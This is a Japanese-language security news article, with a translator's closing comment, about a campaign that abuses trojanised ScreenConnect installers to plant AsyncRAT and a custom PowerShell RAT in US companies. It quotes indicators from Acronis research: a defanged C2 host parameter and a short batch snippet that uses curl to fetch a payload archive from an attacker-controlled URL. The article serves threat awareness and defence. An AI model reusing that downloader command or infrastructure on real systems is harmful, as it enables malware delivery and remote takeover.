ScreenConnect インストーラを悪用する脅威アクター:米国企業を標的とする初期アクセスの確立

Threats Actors Weaponize ScreenConnect Installers to Gain Initial Access to Organizations

2025/09/05 CyberSecurityNews — ConnectWise ScreenConnect のトロイの木馬化されたインストーラを介した、高度なサイバー攻撃キャンペーンが米国企業を標的に展開されており、RMM (Remote Monitoring and Management) ツールの悪用における大きな進展を示している。2025年3月以降に、これらの攻撃は頻度と技術の高度化を達成し、正規の管理ソフトウェアを悪用することで、企業ネットワーク内に永続的な足場を築いている。

この攻撃者は、欺瞞的なソーシャル・エンジニアリング戦術を用いて、 “agreement_support-pdf[.]Client[.]exe” や “Social_Security_Statement_Documents_386267[.]exe” といった公式文書を装う悪意のインストーラを配布している。これらの悪意のファイルは、正規のサポート資料や金融文書を装うものであり、ユーザーの信頼を悪用することで、システムへの初期アクセスを確立する。このインストーラが実行されると、攻撃者が管理するサーバへの接続が確立され、被害者のマシンはリモートからアクセスが可能な資産となる。

このキャンペーンが、従来からの ScreenConnect 悪用と異なる点は、これまでのフルインストーラではなく、ClickOnce ランナー・インストーラを展開するところにある。

Acronis の研究者たちが突き止めたのは、これらの進化したインストーラには埋め込みコンフィグ・データがなく、その代わりに、侵害したインフラから実行時にコンポーネントとコンフィグを取得するという手法である。このアーキテクチャの変更により、疑わしい埋め込みコンフィグを特定する、従来からの静的分析手法は無効となり、検出作業が大幅に複雑化している。

この脅威アクターは、侵害したシステム上に、複数のリモートアクセス型トロイの木馬 (RAT) を同時に展開することで、極めて複雑な運用を実証している。

ScreenConnect のインストールから数分以内に、自動化されたプロセスにより、十分に検証された AsyncRAT と、キャンペーン専用に開発された PowerShell ベースのカスタム RAT の両方が展開される。この二重展開の戦略が示唆するのは、複数の脅威グループ間でのインフラ共有もしくは、冗長化された計画である。

高度な感染チェーンの分析

このキャンペーンの高度な技術は、多段階の感染プロセスを調査することで、明らかになった。最初の ClickOnce インストーラは、”e = Support & y = Guest & h = morco[.]rovider[.]net & p = 8041″ などのパラメータを介して攻撃者のインフラに接続し、侵害済の仮想プライベート・サーバ上にホストされた C2 (Command and Contorl) サーバとの通信を確立する。

The complete infection chain of AsyncRAT (Source – Acronis)

このインストールが成功した後に、ScreenConnect の組み込み自動化機能を悪用するマルウェアが、 “BypaasaUpdate[.]bat” というバッチ・ファイルを実行する。この初期ペイロードは高度なダウンローダとして機能し、複数のエンコードされたコンポーネントなどを取りこんだ、圧縮アーカイブを取得する。

set LINK = https[:]//guilloton[.]fr/x[.]zip
set ZIP_PATH = %ProgramData% \ali[.]zip
curl - s - o "%ZIP_PATH%" %LINK%

ダウンロードされたアーカイブには、”1[.]txt” (AsyncRAT を含む)/”pe[.]txt” (AMSI バイパスメカニズム)/”Skype[.]ps1″ (PowerShell 実行スクリプト) などの、戦略的に命名されたファイルが含まれている。この命名規則は、シグネチャ・ベースの検出システムを回避するための、意図的な難読化を示している。

また、永続化のためのメカニズムには、1分ごとに実行されるスケジュール・タスクを設定しながら、重複インスタンスを防ぐミューテックス・チェックを実装するという、巧妙な工夫が凝らされている。

そして PowerShell スクリプト “Skype[.]ps1” は、エンコードされた .NET アセンブリを直接メモリに読み込むことで、従来のファイル・ベースの検出手法を回避しながら、脅威アクターによるシステムへの継続的アクセスを維持する。

このキャンペーンが明示するのは、RMM ツールの武器化における懸念すべき進化である。脅威アクターたちは、正規ソフトウェアの悪用と高度な回避手法を組み合わせることで、組織への永続的アクセスを確立している。

正規の管理ツールである ScreenConnect のインストーラが悪用され、米国企業に被害が生じているようです。注目すべきは、ユーザーが信頼しやすい公式文書を装う、トロイの木馬化されたインストーラであり、そこから攻撃者が管理するサーバへ接続が確立される仕組みです。さらに、従来からの検出を逃れるために、ペイロードへのコンフィグの埋め込みを排除し、実行時に外部から取得する方式が使われています。こうした構造的な工夫により、セキュリティ製品による発見が難しくなっていると、この記事は指摘しています。よろしければ、ScreenConnect で検索も、ご参照ください。